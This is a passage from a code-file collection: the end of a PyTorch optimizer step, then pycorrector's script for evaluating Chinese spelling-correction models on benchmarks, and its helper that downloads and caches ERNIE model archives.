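                #   beta  = -gradients_sum / (L * max(grad_norm_sum + L, alpha * L))
                #   new_w = beta * (L + reward)
                # i.e. bet a capped fraction beta of the current "wealth" (L + reward).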
new_w = state['w'] = -gradients_sum / (L * torch.max(grad_norm_sum + L, alpha * L)) * (L + reward)
p.data.add_(-1, old_w)
p.data.add_(new_w)
return loss
``` |
{
"source": "jpegbert/pycorrector",
"score": 2
} |
#### File: pycorrector/examples/evaluate_models.py
```python
import argparse
import os
import sys
sys.path.append("../")
import pycorrector
pwd_path = os.path.abspath(os.path.dirname(__file__))
def demo():
idx_errors = pycorrector.detect('少先队员因该为老人让坐')
print(idx_errors)
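    # A hedged aside: pycorrector also exposes correct() for end-to-end fixing;
    # its return format differs between versions, so it is shown here only as an
    # illustrative comment.
    # corrected, details = pycorrector.correct('少先队员因该为老人让坐')
    # print(corrected, details)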
def main(args):
if args.data == 'sighan_15' and args.model == 'rule':
# right_rate:0.1798201798201798, right_count:180, total_count:1001;
# recall_rate:0.15376676986584106, recall_right_count:149, recall_total_count:969, spend_time:121 s
from pycorrector.utils.eval import eval_sighan_2015_by_rule
eval_sighan_2015_by_rule()
if args.data == 'sighan_15' and args.model == 'bert':
# right_rate:0.37623762376237624, right_count:38, total_count:101;
# recall_rate:0.3645833333333333, recall_right_count:35, recall_total_count:96, spend_time:503 s
from pycorrector.utils.eval import eval_sighan_2015_by_bert
eval_sighan_2015_by_bert()
if args.data == 'sighan_15' and args.model == 'ernie':
# right_rate:0.297029702970297, right_count:30, total_count:101;
# recall_rate:0.28125, recall_right_count:27, recall_total_count:96, spend_time:655 s
from pycorrector.utils.eval import eval_sighan_2015_by_ernie
eval_sighan_2015_by_ernie()
if args.data == 'corpus500' and args.model == 'rule':
# right_rate:0.486, right_count:243, total_count:500;
# recall_rate:0.18, recall_right_count:54, recall_total_count:300, spend_time:78 s
from pycorrector.utils.eval import eval_corpus500_by_rule, eval_data_path
        # Evaluate the precision/recall of the rule-based correction method
out_file = os.path.join(pwd_path, './eval_corpus_error_by_rule.json')
eval_corpus500_by_rule(eval_data_path, output_eval_path=out_file)
if args.data == 'corpus500' and args.model == 'bert':
# right_rate:0.586, right_count:293, total_count:500;
# recall_rate:0.35, recall_right_count:105, recall_total_count:300, spend_time:1760 s
from pycorrector.utils.eval import eval_corpus500_by_bert, eval_data_path
        # Evaluate the precision/recall of the BERT-based correction model
out_file = os.path.join(pwd_path, './eval_corpus_error_by_bert.json')
eval_corpus500_by_bert(eval_data_path, output_eval_path=out_file)
if args.data == 'corpus500' and args.model == 'ernie':
# right_rate:0.598, right_count:299, total_count:500;
# recall_rate:0.41333333333333333, recall_right_count:124, recall_total_count:300, spend_time:6960 s
from pycorrector.utils.eval import eval_corpus500_by_ernie, eval_data_path
        # Evaluate the precision/recall of the ERNIE-based correction model
out_file = os.path.join(pwd_path, './eval_corpus_error_by_ernie.json')
eval_corpus500_by_ernie(eval_data_path, output_eval_path=out_file)
if __name__ == '__main__':
demo()
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default='sighan_15', help='evaluate dataset, sighan_15/corpus500')
parser.add_argument('--model', type=str, default='rule', help='which model to evaluate, rule/bert/ernie')
args = parser.parse_args()
main(args)
```
#### File: pycorrector/ernie/file_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import os
from pathlib import Path
from tqdm import tqdm
log = logging.getLogger(__name__)
def _fetch_from_remote(url, force_download=False, cached_dir='~/.paddle-ernie-cache'):
import hashlib, requests, tarfile
sig = hashlib.md5(url.encode('utf8')).hexdigest()
cached_dir = Path(cached_dir).expanduser()
try:
cached_dir.mkdir()
except OSError:
pass
cached_dir_model = cached_dir / sig
if force_download or not cached_dir_model.exists():
cached_dir_model.mkdir()
tmpfile = cached_dir_model / 'tmp'
with tmpfile.open('wb') as f:
# url = 'https://ernie.bj.bcebos.com/ERNIE_stable.tgz'
r = requests.get(url, stream=True)
total_len = int(r.headers.get('content-length'))
for chunk in tqdm(r.iter_content(chunk_size=1024),
total=total_len // 1024,
desc='downloading %s' % url,
unit='KB'):
if chunk:
f.write(chunk)
f.flush()
        log.debug('extracting... to %s' % tmpfile)
with tarfile.open(tmpfile.as_posix()) as tf:
tf.extractall(path=cached_dir_model.as_posix())
os.remove(tmpfile.as_posix())
log.debug('%s cached in %s' % (url, cached_dir))
return cached_dir_model
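# Illustrative usage (hypothetical URL and archive layout, for orientation only):
# the archive is downloaded once, extracted into a cache directory named after
# md5(url), and later calls with the same URL reuse that cached directory.
#
#   model_dir = _fetch_from_remote('https://example.com/ERNIE_stable.tgz')
#   config_path = model_dir / 'ernie_config.json'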
def add_docstring(doc):
def func(f):
        f.__doc__ += ('\n======other docs from super class ======\n%s' % doc)
return f
return func
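# Illustrative use of add_docstring (hypothetical classes, shown as a comment only):
#
#   class Child(Base):
#       @add_docstring(Base.method.__doc__)
#       def method(self):
#           """Child-specific notes."""
#
# Child.method.__doc__ then ends with the inherited text appended by the decorator.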
``` |